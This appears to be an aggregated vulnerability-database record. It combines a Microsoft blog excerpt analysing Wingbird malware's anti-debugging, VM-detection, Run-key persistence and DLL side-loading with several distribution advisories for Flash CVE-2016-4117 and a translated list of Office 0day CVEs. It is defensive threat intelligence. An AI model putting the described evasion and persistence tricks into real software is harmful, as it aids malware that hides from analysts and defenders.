anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Here's a summary of interesting tidbits, which we will expand on in an upcoming detailed report on Wingbird.\n\nThe Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. 
The first few stages are loaders that can probe whether they are being run in virtualized or debugged environments. We found at least 12 different checks to evade the malware's execution in these environments. The most effective ones are:\n\n * Sandbox environment checks\n * Checks if the malware is executed under the root folder of a drive\n * Checks if the malware file is readable from an external source and if the execution path contains the MD5 of its own contents\n\n\n\n * Fingerprinting check\n * Checks if the machine GUID, Windows product ID, and system BIOS are from well-known sources\n * VM detection\n * Checks if the machine hardware IDs are _VmBus_ in case of Hyper-V, or _VEN_15AD_ in case of VMware, etc.\n * Debugger detection\n * Detects a debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)\n\n\n\nThe latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:\n\n * _ [randomName].cab_ - Encrypted configuration file\n * _ setup.cab_ - The last PE code section of the setup module; content still unknown\n * _ d3d9.dll_ - Malware loader used on systems with restricted privileges; the module is protected by a VM\n * _ aepic.dll_ (or other name) - Malware loader used on admin-privileged systems; executed from (and injected into) a fake service; protected by a VM\n * _ msvcr90.dll_ - Malware loader DLL injected into the explorer.exe or winlogon.exe process; protected by a VM\n * _ [randomName].7z_ - Encrypted network plugin, used to spy on the victim's network communications\n * _ wsecedit.rar_ - Main dropped malware executable, protected by a VM\n\nIn the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in 
[_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>), or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. If the malware is running with restricted privileges, persistence is achieved by creating a Run key value as shown below. The value name is taken from the encrypted configuration file.\n\n_HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run_ \n_ Value: \"{Random value taken from config file}\"_ \n_ With data: \"C:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE C:\\PROGRAMDATA\\AUDITAPP\\D3D9.DLL, CONTROL_RUN\"_\n\nIf the startup command is 2, the malware copies explorer.exe into the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL in memory using the DLL side-loading technique.\n\nAll of Wingbird's plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connections, or even diverting SSL connections.\n\nGiven the complex nature of the threat, we will provide a more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.\n\n## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite\n\nMicrosoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files, leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like the ones below in Office 365's Threat Explorer page:\n\n\n\n\n\n_Figure 7. 
Office 365 ATP detection_\n\nCustomers using [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.\n\n\n\n_Figure 8. Windows Defender ATP alert_\n\nIn addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in the [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).\n\n\n\n_Figure 9. Windows Defender Exploit Guard detection_\n\nCrimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.\n\nAt Microsoft, we don't stop working to protect our customers' mailboxes. 
Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.", "edition": 2, "cvss3": {}, "published": "2017-11-21T13:46:01", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-1099", "CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8570", "CVE-2017-8750", "CVE-2017-8759"], "modified": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 11.2.202.621 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. This update resolves type confusion vulnerabilities that could lead to code execution (CVE-2016-1105, CVE-2016-4117). 
This update resolves use-after-free vulnerabilities that could lead to code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110). This update resolves a heap buffer overflow vulnerability that could lead to code execution (CVE-2016-1101). This update resolves a buffer overflow vulnerability that could lead to code execution (CVE-2016-1103). This update resolves memory corruption vulnerabilities that could lead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115). This update resolves a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-4116). Adobe reports that an exploit for CVE-2016-4117 exists in the wild. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-12T20:00:19", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2016-05-12T20:00:19", "id": "MGASA-2016-0173", "href": "https://advisories.mageia.org/MGASA-2016-0173.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "description": "- CVE-2016-1096:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1097:\n\nUse-after-free. Wen Guanxing from Pangu LAB, working with the Chromium\nVulnerability Rewards Program .\n\n- CVE-2016-1098:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1099:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1100:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1101:\n\nHeap buffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1102:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1103:\n\nBuffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1104:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1105:\n\nType confusion. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1106:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1107:\n\nUse-after-free. NSFOCUS Security Team.\n\n- CVE-2016-1108:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1109:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1110:\n\nUse-after-free. 
Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-4108:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-4109:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4110:\n\nUse-after-free. willJ of Tencent PC Manager.\n\n- CVE-2016-4111:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4112:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4113:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4114:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4115:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4116:\n\nVulnerability in the directory search path used to find resources.\nLadislav Baco of CSIRT.SK.\n\n- CVE-2016-4117:\n\nType confusion vulnerability that could lead to code execution. Genwei\nJiang of FireEye, Inc.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-12T00:00:00", "type": "archlinux", "title": "lib32-flashplugin: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", 
"CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2016-05-12T00:00:00", "id": "ASA-201605-18", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000625.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:44:46", "description": "- CVE-2016-1096:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1097:\n\nUse-after-free. Wen Guanxing from Pangu LAB, working with the Chromium\nVulnerability Rewards Program .\n\n- CVE-2016-1098:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1099:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1100:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1101:\n\nHeap buffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1102:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1103:\n\nBuffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1104:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1105:\n\nType confusion. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1106:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1107:\n\nUse-after-free. NSFOCUS Security Team.\n\n- CVE-2016-1108:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1109:\n\nUse-after-free. 
Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1110:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-4108:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-4109:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4110:\n\nUse-after-free. willJ of Tencent PC Manager.\n\n- CVE-2016-4111:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4112:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4113:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4114:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4115:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4116:\n\nVulnerability in the directory search path used to find resources.\nLadislav Baco of CSIRT.SK.\n\n- CVE-2016-4117:\n\nType confusion vulnerability that could lead to code execution. Genwei\nJiang of FireEye, Inc.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-12T00:00:00", "type": "archlinux", "title": "flashplugin: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2016-05-12T00:00:00", "id": "ASA-201605-16", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000623.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mscve": [{"lastseen": "2021-12-06T18:25:26", "description": "This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin [APSB16-15](<http://helpx.adobe.com/security/products/flash-player/apsb16-15.html>):\n\nCVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-10T07:00:00", "type": "mscve", "title": "March 2016 Adobe Flash Security Update", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2017-05-17T07:00:00", "id": "MS:ADV160002", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV160002", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nAdobe reports:\n\nThese updates resolve type confusion vulnerabilities that could\n\t lead to code execution (CVE-2016-1105, CVE-2016-4117).\nThese updates resolve use-after-free vulnerabilities that could\n\t lead to code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107,\n\t CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n\t CVE-2016-4110, CVE-2016-4121).\nThese updates resolve a heap buffer overflow vulnerability that\n\t could lead to code execution (CVE-2016-1101).\nThese updates resolve a buffer overflow vulnerability that could\n\t lead to code execution (CVE-2016-1103).\nThese updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099,\n\t CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n\t CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, 
CVE-2016-4114,\n\t CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161,\n\t CVE-2016-4162, CVE-2016-4163).\nThese updates resolve a vulnerability in the directory search path\n\t used to find resources that could lead to code execution\n\t (CVE-2016-4116).\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-12T00:00:00", "type": "freebsd", "title": "flash -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2016-05-12T00:00:00", "id": "0C6B008D-35C4-11E6-8E82-002590263BF5", "href": 
"https://vuxml.freebsd.org/freebsd/0c6b008d-35c4-11e6-8e82-002590263bf5.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T20:36:22", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.621.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities, detailed in the Adobe Security Bulletin listed in the\nReferences section, could allow an attacker to create a specially crafted SWF\nfile that would cause flash-plugin to crash, execute arbitrary code, or disclose\nsensitive information when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099,\nCVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104,\nCVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\nCVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\nCVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116,\nCVE-2016-4117)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "redhat", "title": "(RHSA-2016:1079) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2018-06-07T05:04:30", "id": "RHSA-2016:1079", "href": "https://access.redhat.com/errata/RHSA-2016:1079", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. 
\nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nWe first classify the vulnerabilities listed above by the type of component involved. Note that Flash itself is also an ActiveX control; in the classification table below I treat it as a separate class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control parsing problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nVulnerabilities loaded by means of a Moniker \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerabilities \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then classify the non-Flash vulnerabilities listed above by vulnerability type. 
